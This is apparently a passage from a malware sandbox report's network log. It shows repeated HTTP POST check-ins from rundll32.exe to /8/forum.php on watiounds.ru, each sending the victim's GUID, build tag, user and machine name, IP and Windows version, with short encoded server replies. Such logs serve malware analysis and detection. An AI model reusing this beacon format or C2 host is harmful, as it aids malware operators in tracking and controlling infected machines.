                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:32.081218958 CEST351INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4a 51 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTJQGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          283192.168.2.224944895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:32.405915022 CEST352OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:32.528681040 CEST352INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBNMYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          284192.168.2.224944995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:32.848551035 CEST353OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:32.971656084 CEST353INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 59 42 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAYBZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          285192.168.2.224945095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:33.286834002 CEST354OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:33.407757044 CEST354INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 4a 51 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAJQZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          286192.168.2.224945195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:33.836457014 CEST355OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:33.959086895 CEST355INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          287192.168.2.224945295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:34.278989077 CEST356OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:34.407383919 CEST357INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQTGJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          288192.168.2.224945395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:35.085056067 CEST357OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:35.229091883 CEST358INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 54 47 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTTGGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          289192.168.2.224945495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:35.973766088 CEST358OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:36.098089933 CEST359INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVJQEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          29192.168.2.224919495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:36.460486889 CEST67OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:36.583070993 CEST68INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZVEAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          290192.168.2.224945595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:36.412252903 CEST360OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:36.535362959 CEST360INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMJQNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          291192.168.2.224945695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:36.859251976 CEST361OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:36.985173941 CEST361INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          292192.168.2.224945795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:37.305062056 CEST362OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:37.428684950 CEST362INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMVENARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          293192.168.2.224945895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:37.743182898 CEST363OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:37.865976095 CEST363INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTZAGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          294192.168.2.224945995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:38.171437025 CEST364OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:38.294384003 CEST364INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          295192.168.2.224946095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:38.622042894 CEST365OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:38.749775887 CEST365INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          296192.168.2.224946195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:39.065876961 CEST366OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:39.194204092 CEST367INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQJQJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          297192.168.2.224946295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:39.527808905 CEST367OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:39.657037973 CEST368INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJJQQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          298192.168.2.224946395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:39.978475094 CEST369OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:40.108839989 CEST369INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMMNNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          299192.168.2.224946495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:40.423877001 CEST370OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
